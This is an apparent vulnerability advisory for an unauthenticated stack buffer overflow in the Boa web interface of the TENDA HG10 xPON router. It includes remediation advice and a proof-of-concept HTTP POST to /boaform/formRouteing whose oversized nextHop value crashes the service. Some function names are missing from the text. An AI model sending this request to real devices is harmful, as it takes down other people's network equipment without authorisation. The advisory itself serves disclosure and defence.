TENDA HG10 Boa Web Interface Stack Buffer Overflow (CWE-121)

TENDA HG10: Stack Buffer Overflow Vulnerability (CWE-121) Vulnerability Overview The web management interface of TENDA HG10 ( ) contains a stack buffer overflow vulnerability. An attacker can cause the Boa service to crash or potentially achieve arbitrary code execution by sending an overly long parameter. Impact Scope Impact Type: Denial of Service (DoS); potential Remote Code Execution (RCE). Authentication Requirement: No authentication required. Affected Product: TENDA HG10 AC1200 Dual-Band Wi-Fi xPON ONT. Firmware Version: HG7_HG9_HG10re_300001138_en_xpon. Technical Details The vulnerability is located in the handler function of the Boa component. This function uses to retrieve the parameter and then copies it to the stack-based buffer using . Since is only allocated 20 bytes and performs no length checking, a buffer overflow occurs. Remediation Validate or truncate the length of the parameter before copying data. Replace with a safe string copy function such as . Proof of Concept (PoC) Steps: 1. Connect to the TENDA HG10 management interface. 2. Send a POST request containing an excessively long parameter. 3. Observe that the Boa service crashes and the web interface becomes inaccessible. Example Request: ```http POST /boaform/formRouteing HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:149.0) Gecko/20100101 Firefox/149.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.6,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 228 Origin: http://192.168.188.140:8888 Connection: keep-alive Referer: http://192.168.188.140:8888/admin/login.asp Upgrade-Insecure-Requests: 1 Priority: u=0, 1 destNet=1.1.0&subMask=255.255.255.0&interface=lan1&nextHop=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

Goal Reached Thanks to every supporter — we hit 100%!

TENDA HG10 Boa Web Interface Stack Buffer Overflow (CWE-121)

More from this source